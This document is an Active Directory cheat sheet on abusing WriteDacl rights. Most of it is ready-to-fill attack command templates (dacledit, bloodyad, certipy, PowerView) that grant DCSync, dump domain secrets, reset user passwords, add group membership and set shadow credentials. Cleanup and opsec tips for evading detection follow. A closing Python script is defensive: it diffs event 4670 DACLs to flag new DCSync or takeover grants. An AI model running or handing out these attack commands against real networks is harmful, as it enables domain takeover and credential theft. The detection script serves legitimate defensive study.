WriteDacl

The source principal can modify the DACL (Discretionary Access Control List) of the target object, so it can grant itself any right on that object

Applies to: User/Group/Computer → User, Group, Computer, Domain, GPO


Linux Abuse

Grant GenericAll/DCSync on Domain object

dacledit.py -action write -rights DCSync \
    -principal <username> \
    -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>

Grant GenericAll on target User

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

# Then abuse GenericAll: reset password, shadow creds, Kerberoast, etc.
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

Grant GenericAll on target Group

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'

Grant GenericAll on target Computer

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-computer>,CN=Computers,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

# Then RBCD or shadow credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-computer$> -dc-ip <dc-ip>

Windows Abuse

Grant DCSync rights on Domain

# Building blocks for a manual ActiveDirectoryAccessRule (not used by the PowerView one-liner below)
$Rights = [System.DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
$ControlType = [System.Security.AccessControl.AccessControlType]::Allow
$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None

# Using PowerView
Add-DomainObjectAcl -TargetIdentity '<domain>' -PrincipalIdentity '<username>' -Rights DCSync -Credential $cred

Grant FullControl on target User

Add-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred
# Then:
Set-DomainUserPassword -Identity <target-user> -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

Grant FullControl on target Group

Add-DomainObjectAcl -TargetIdentity '<target-group>' -PrincipalIdentity '<username>' -Rights All -Credential $cred
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred

Cleanup

Remove-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred

Opsec

  • ACL changes on high-value objects (Domain, DA group) generate event 4670 and are monitored by most EDRs
  • Prefer granting DCSync or targeted writes over FullControl — smaller footprint in the DACL diff
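The Opsec notes above describe the DACL change from the detection side: the event records the object's security descriptor before and after the change, so the interesting signal is the set of ACEs that were added. The following is an added example (not part of the original cheat sheet, and not code from any of the tools listed on it): a small Python script that parses the DACL of two SDDL strings, diffs them, and flags newly added ACEs that grant the DCSync extended rights (the two DS-Replication-Get-Changes GUIDs) or GenericAll/WriteDacl/WriteOwner. It assumes 4670 events exported as XML with `OldSd` and `NewSd` data fields holding SDDL; the sample event, SIDs and object name are constructed. The `principals_with` helper goes slightly beyond the diff and lists who already holds a given right (for example WD, the WriteDacl edge itself) on an object.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Well-known AD extended-right GUIDs that together permit DCSync
# (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All).
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}
# Generic/standard rights that let a principal take over the object outright:
# GA = GenericAll, WD = WriteDacl, WO = WriteOwner.
TAKEOVER_TOKENS = {"GA", "WD", "WO"}
# Bit values used when SDDL writes the mask as a hex number instead of tokens.
RIGHT_BITS = {"GA": 0x10000000, "WD": 0x00040000, "WO": 0x00080000, "CR": 0x00000100}


@dataclass(frozen=True)
class Ace:
    ace_type: str      # A (allow), OA (object allow), D (deny), ...
    flags: str
    rights: str        # token string such as "GA" or "RPWPCR", or a hex mask
    object_guid: str   # extended right / property GUID for OA aces
    inherit_guid: str
    sid: str           # trustee: SDDL alias (DA, AU) or full S-1-5-... SID


def parse_dacl(sddl):
    """Return the set of ACEs in the D: (DACL) section of an SDDL string."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return set()
    aces = set()
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")
        if len(parts) < 6:
            continue  # malformed ACE: skip rather than guess
        ace_type, flags, rights, obj, inh, sid = parts[:6]
        aces.add(Ace(ace_type, flags, rights, obj.lower(), inh.lower(), sid))
    return aces


def rights_tokens(rights):
    """Split an SDDL rights field into two-letter tokens (hex masks are decoded)."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for name, bit in RIGHT_BITS.items() if mask & bit}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def classify(ace):
    """Label an allow ACE that grants DCSync or object takeover, else None."""
    if ace.ace_type not in ("A", "OA"):
        return None
    toks = rights_tokens(ace.rights)
    if ace.ace_type == "OA" and "CR" in toks and ace.object_guid in DCSYNC_GUIDS:
        return "DCSync extended right"
    if toks & TAKEOVER_TOKENS:
        return "GenericAll/WriteDacl/WriteOwner"
    return None


def new_dangerous_aces(old_sd, new_sd):
    """Diff two SDDL strings; return (sid, label) for each newly added risky ACE."""
    added = parse_dacl(new_sd) - parse_dacl(old_sd)
    findings = []
    for ace in sorted(added, key=lambda a: (a.sid, a.rights, a.object_guid)):
        label = classify(ace)
        if label:
            findings.append((ace.sid, label))
    return findings


def principals_with(sddl, token):
    """List trustees whose allow ACEs carry the given right token (e.g. "WD")."""
    return sorted({a.sid for a in parse_dacl(sddl)
                   if a.ace_type == "A" and token in rights_tokens(a.rights)})


def analyze_4670(event_xml):
    """Pull OldSd/NewSd out of a 4670 event and report what the change granted."""
    data = {}
    for el in ET.fromstring(event_xml).iter():
        if el.tag.rsplit("}", 1)[-1] == "Data":
            data[el.get("Name")] = el.text or ""
    return {
        "subject": data.get("SubjectUserName", ""),
        "object": data.get("ObjectName", ""),
        "findings": new_dangerous_aces(data.get("OldSd", ""), data.get("NewSd", "")),
    }


# Constructed sample event (not a real capture): user "lowpriv" adds both
# replication extended rights for SID ...-1104 and GenericAll for ...-1105
# to the DACL of the domain head. Existing DA/AU entries are unchanged.
SAMPLE_4670 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4670</EventID></System>
  <EventData>
    <Data Name="SubjectUserName">lowpriv</Data>
    <Data Name="ObjectType">DS</Data>
    <Data Name="ObjectName">DC=corp,DC=example</Data>
    <Data Name="OldSd">O:DAG:DAD:(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;DA)</Data>
    <Data Name="NewSd">O:DAG:DAD:(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;DA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1104)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1104)(A;;GA;;;S-1-5-21-1111-2222-3333-1105)</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    result = analyze_4670(SAMPLE_4670)
    print(f"{result['subject']} changed the DACL of {result['object']}")
    for sid, label in result["findings"]:
        print(f"  NEW {label}: {sid}")
```

Feeding real events means exporting them as XML (for example from the Security log) and passing each event's XML to `analyze_4670`; only ACEs absent from `OldSd` are reported, so the long-standing Domain Admins entry in the sample is ignored while the two DCSync grants and the GenericAll grant are surfaced. Hex rights masks are decoded against the GA/WD/WO/CR bits, so a grant written as `0x10000000` is treated the same as `GA`.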